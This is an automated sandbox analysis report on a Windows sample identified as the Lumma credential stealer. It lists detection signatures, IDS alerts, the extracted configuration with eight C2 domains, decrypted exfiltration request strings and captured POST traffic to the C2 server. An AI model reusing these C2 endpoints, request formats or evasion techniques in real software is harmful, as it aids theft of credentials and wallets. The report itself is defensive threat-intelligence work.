Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545042
MD5:00e4faf579951dedcfe07699f0816ea9
SHA1:39c1e768620ecd4d0da3b1625a8186377f186f04
SHA256:61026d58b1772d55debe9e7cf29acf688b23ed1b1eda22f499dde79037bcef8e
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 00E4FAF579951DEDCFE07699F0816EA9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["founpiuer.store", "necklacedmny.store", "crisiwarny.store", "fadehairucw.store", "navygenerayk.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Byone--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2123719627.00000000011B4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 10 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:27:00.796437+010020546531A Network Trojan was detected192.168.2.549704188.114.97.3443TCP
              2024-10-30T02:27:01.973958+010020546531A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:27:00.796437+010020498361A Network Trojan was detected192.168.2.549704188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:27:01.973958+010020498121A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:27:00.285955+010020571241Domain Observed Used for C2 Detected192.168.2.549704188.114.97.3443TCP
              2024-10-30T02:27:01.506961+010020571241Domain Observed Used for C2 Detected192.168.2.549705188.114.97.3443TCP
              2024-10-30T02:27:02.910210+010020571241Domain Observed Used for C2 Detected192.168.2.549706188.114.97.3443TCP
              2024-10-30T02:27:04.230056+010020571241Domain Observed Used for C2 Detected192.168.2.549707188.114.97.3443TCP
              2024-10-30T02:27:05.844141+010020571241Domain Observed Used for C2 Detected192.168.2.549708188.114.97.3443TCP
              2024-10-30T02:27:07.574027+010020571241Domain Observed Used for C2 Detected192.168.2.549709188.114.97.3443TCP
              2024-10-30T02:27:09.216409+010020571241Domain Observed Used for C2 Detected192.168.2.549710188.114.97.3443TCP
              2024-10-30T02:27:11.546110+010020571241Domain Observed Used for C2 Detected192.168.2.549711188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:26:59.599684+010020571291Domain Observed Used for C2 Detected192.168.2.5513741.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:26:59.610112+010020571271Domain Observed Used for C2 Detected192.168.2.5631901.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:26:59.635028+010020571231Domain Observed Used for C2 Detected192.168.2.5548861.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:26:59.580284+010020571311Domain Observed Used for C2 Detected192.168.2.5547121.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:26:59.622783+010020571251Domain Observed Used for C2 Detected192.168.2.5637631.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T02:27:08.044078+010020480941Malware Command and Control Activity Detected192.168.2.549709188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.5800.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "necklacedmny.store", "crisiwarny.store", "fadehairucw.store", "navygenerayk.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Byone--"}
              Multi AV Scanner detection for domain / URL
              Source: necklacedmny.storeVirustotal: Detection: 20%Perma Link
              Source: presticitpo.storeVirustotal: Detection: 11%Perma Link
              Source: fadehairucw.storeVirustotal: Detection: 12%Perma Link
              Source: thumbystriw.storeVirustotal: Detection: 14%Perma Link
              Multi AV Scanner detection for submitted file
              Source: file.exeVirustotal: Detection: 50%Perma Link
              Source: file.exeReversingLabs: Detection: 39%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cwde 0_3_011AFF9C

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:54886 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54712 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:63763 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:51374 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:63190 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1259Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570588Host: necklacedmny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
              Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
              Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2105181277.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000003.2105019285.0000000001199000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135307074.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
              Source: file.exe, file.exe, 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2166544965.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105019285.0000000001199000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123467176.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123446678.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120936857.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2136155560.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135354611.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089453948.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135255919.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2146961221.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120905193.000000000119B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123719627.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171551202.00000000011BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123784394.00000000011BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000002.2171551202.00000000011BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api-
              Source: file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiY
              Source: file.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apie
              Source: file.exe, 00000000.00000002.2171310679.000000000110E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apis
              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2077360679.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077139842.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
